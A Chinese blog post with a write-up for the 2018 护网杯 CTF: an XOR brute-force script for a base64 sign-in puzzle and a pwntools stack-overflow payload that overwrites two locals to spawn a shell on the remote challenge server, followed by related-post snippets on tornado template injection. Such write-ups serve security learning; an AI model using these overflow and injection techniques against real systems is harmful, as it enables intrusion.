护网杯writeup以及赛后反思

最新推荐文章于 2023-03-30 10:00:38 发布
最新推荐文章于 2023-03-30 10:00:38 发布
阅读量1.5k 收藏
点赞数
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36992198/article/details/83043216
版权

迟来的签到题

这个题目给了一个base64加密过的字符串,还有题目的提示信息是easy xor???猜想是先将这个字符串解密然后和一个数来异或,但是不知道和谁异或,所以就采用了爆破的方式来爆破出异或的值和flag。

解题脚本:

#conding=utf-8
import base64 as bs
s="AAoHAR0jJ1AlVVEkU1BUVCAlIlFTUVUiUFRTVFVeU1FXUCVUJxs="
st=list(bs.b64decode(s))
print st
for j in range(255):
    stt=""
    for i in range(len(st)):
        stt+=chr(ord(st[i])^j)
    if "flag" in stt:
        print(stt)
        print(j)


pwn getstart

这个题搞了好久,看到题目开了各种保护措施,然后就一直想用ROP绕过,最后也没搞出来,看到群里大佬share的writeup,发现根本就不用绕过这些保护措施,直接利用栈溢出漏洞来覆盖v7,v8的值,使其满足判断条件,就直接可以执行system("/bin/sh")了。

if ( v7 = 0x7FFFFFFFFFFFFFFFLL || v8 = 0.1 )

v8的值可以这样来做:0x3fb999999999999a 内存存储方式
=> 00111111 10111001 10011001 ... 10011001 10011010 二进制展开
=>0|0111111 1011|1001 10011001 ... 10011001 10011010 分割区域
=>0|0111111 1011|11001 10011001 ... 10011001 10011010 补整数1
=>提取符号位0,指数位去偏移-4,尾数1.10011001....
=>0.000110011...=>0*2^1 + 0*2^-1 + 0*2^-2 + 0*2^-3 + 1*2^-4 + 1*2^-5....
=>0.0625 + 0.03125 + ...
求值过程会发现,浮点运算是有精度丢失的问题的,因为 0.1 这种表达是一个近似值。

-0000000000000030 buf             dq ?

0000000000000018 v7         dq ?

所以要填充(0x30-0x18)个字节

具体payload的如下:

from pwn import *
r=remote("49.4.9.11","32682")
r.recv()
payload=(0x30-0x18)*'a'+p64(0x7FFFFFFFFFFFFFFF)+p64(0x3fb999999999999a)
r.sendline(payload)
r.interactive()

 

木木or沐沐
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[护网 2018]easy_tornado(SSTI服务器端模板注入)
weixin_45253573的博客
11-12 653
tornado Tornado是一种 Web 服务器软件的开源版本。Tornado 和主流Web 服务器框架(包括大多数 Python 的框架)有着明显的区别:它是非阻塞式服务器,而且速度相当快。 可以考虑服务器端模板注入 参考SSTI完全学习 SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行,SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornado django,php的smarty
[护网 2018]easy_tornado 1
weixin_45674567的博客
06-01 2863
点击/flag.txt,说明flag在 /fllllllllllllag 里。 点击/welcome.txt,render()函数是渲染函数,进行服务器端渲染。 点击/hints.txt,出现: reader()函数联想到模板注入:±*/等符号,都被过滤,^没被过滤,成功回显 根据: 搜素百度得Tornado框架的附属文件handler.settings中存在cookie_secret 尝试:error?msg={{handler.settings}} 得到 结合之前访问/flag.txt、/we..
web buuctf [护网 2018]easy_tornado1
weixin_44214568的博客
03-12 4442
分解信息量: 1.题目名称是easy-tornado:tornado是python的web框架(web框架的产生是避免程序代码与html编码的编码混乱性,框架将传参过程进行独立) 2.打开一共三个链接,分别点开 /flag.txt 提示内容:flag in /fllllllllllllag ,意思就是flag在文件fllllllllllllag里面,需要考虑怎么进入文件里面 /welcome.txt 提示内容:render,render是tornado里面的渲染函数,就是对web网页界面进行编辑的函
[护网 2018]easy_tornado
m0sway的博客
03-30 195
BUU CTF [护网 2018]easy_tornado WriteUp
2019强网crypto writeup
a16511232的博客
05-27 6110
本次write包含以下题目 copperstudy randomstudy 强网先锋-辅助 copperstudy 题目描述 nc 119.3.245.36 12345 连上去返回 [+]proof: skr=os.urandom(8) [+]hashlib.sha256(skr).hexdigest()=1651d7f27f35e8f177633a...
网鼎writeup-护网先锋1
08-04
【网鼎writeup-护网先锋1】的知识点总结: 在网络安全竞赛“网鼎”中,参赛者需要解决一系列挑战,这些挑战涉及到多种安全技术,如代码泄露、漏洞利用、加壳破解、文件格式分析等。以下是各部分的具体知识点: ...
2018护网逆向题目
10-16
总结来说,2018护网的逆向题目是对参赛者逆向工程能力的全面考验,要求他们具备扎实的理论基础、丰富的实践经验以及灵活的解决问题的技巧。通过解决这些题目,参赛者不仅可以提升自身的安全技能,也能更好地理解和...
2020全国工业互联网安全技术技能大赛-护网-chinaiisc2020.zip
10-24
2020全国工业互联网安全技术技能大赛,原来的护网,比赛的原题以及附件,供大家进行学习和交流。祝大家技术进步!
2020全国工业互联网安全技术技能大赛-护网原题及附件-chinaiisc2020
01-11
2020全国工业互联网安全技术技能大赛,原来的护网,比赛的原题以及附件,供大家进行学习和交流。祝大家技术进步!
各大厂商护网面试题汇总
最新发布
06-26
"各大厂商护网面试题汇总" 本资源汇总了各大厂商护网面试题,涵盖了大量的IT知识点,包括go语言免杀shellcode、Windows Defender防御机制、卡巴斯基进程保护、Fastjson不出网、内存Webshell命令执行、域内渗透、...
2021强网Writeup--by Nu1L Team.pdf
06-15
第五届“强网”全国网络安全挑战赛
2018年强网初赛 逆向题目 hide writeup (超详细)
风如激的博客
03-28 3936
这道题有壳,strings搜索是upx3.91。但是不能用upx -d。只好手动脱壳了。难点在于本题目有反调试,有些函数不能步过。首先研究壳。第一句call必须步入。Sub_44f1c5必须步入。 Sub_44F1C5中,0x44f214的rep指令把0x400000到0x44f248复制到0x800000位置。0x44f22c处,rbp是0x84efb5。这句话是start处的第二条指令。这里不...
2018护网_fez_签到_gettingstart
uiop_uiop_uiop的博客
10-13 1250
fez  题目给了两个文件: fez.py: import os def xor(a,b): assert len(a)==len(b) c="" for i in range(len(a)): c+=chr(ord(a[i])^ord(b[i])) return c def f(x,k): return xor(xor(x,k)...
2021第五届强网网络安全挑战赛决赛-crypto writeup
blog
07-15 1196
title: 2021第五届强网网络安全挑战赛决赛-crypto writeup date: 2021-07-11 16:42:54+08:00 author: ljahum categories: notes tags: crypto hiddenFromHomePage: false description: “强网2021” math: enable: true 2021第五届强网网络安全挑战赛决赛-crypto writeup 不垫底就算成功???????????? 蛮恶心的,差点
【BUUCTF】Web题目 WriteUp
Luminous_song的博客
03-12 5814
Web类题目
第三届广东省强网网络安全大赛WEB题writeup
qq_28205153的博客
11-04 4032
1. 小明又被拒绝了 直接访问根目录,报403错误 一般是做了ip限制,加上 X-Forwarded-For 头即可绕过 接着又提示不是管理员,仔细看响应头的 Set-Cookie ,有个 admin=0 ,很明显是通过Cookie来判断是否是管理员,直接在请求中加个 Cookie:admin=1 即可绕过,获取flag. 2.XX? 直接访问根目录,发现是个百度页面,看了下源码,没什...
2019强网Web部分Writeup
systemino的博客
06-16 644
题记 2019年的强网web题目出的都不错,所以对题目进行分析一下。 正文 upload 首先打开界面如下: 有注册和登陆功能! 首先我们注册一个账户,然后登陆,发现可以上传图片:PHP大马 这里首先想到的就是上传木马,但是经过尝试只能上传图片马,并且不能直接利用,经过抓包发现cookie是序列化内容,所以应该是通过cookie传递序列化内容,经过服务器的反序列化,然后...
CTF WriteUp】2020全国工业互联网安全技术技能大赛(原护网)Crypto题解
cccchhhh6819的博客
10-25 6884
Crypto signsystem 题目中的加密算法很奇怪,所以测试一下加密算法的结果,得到如下结论: 在不模n的情况下,该函数加密结果满足以下数列: f(1) = m, f(2) = m^2-2, f(n+2) = m*f(n+1) - f(n) 列出几项观察: m, m^2-2, m^3-3m, m^4-4m^2+2, m^5-5m^3+5m, ... 暂时没有得到有用结论。再看一看e和d的关系,随便找了100个输入,确认e和d在该算法可逆,原理不明。 继续看代码。代码允许输入一个明文m计算enc(
护网2020初赛 密码writeup
qq_39642801的博客
10-28 419
2EM tmp1=pbox1(pt)⊕pbox1(key)tmp2=pbox2(pbox1(pt))⊕pbox2(pbox1(key))⊕pbox2(key)ct=pbox2(pbox1(pt))⊕pbox2(pbox1(key))⊕pbox2(key)⊕key tmp1 = pbox1(pt) \oplus pbox1(key) \\ tmp2 = pbox2(pbox1(pt)) \oplus pbox2(pbox1(key)) \oplus pbox2(key) \\ ct = pbox2(pbox1
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值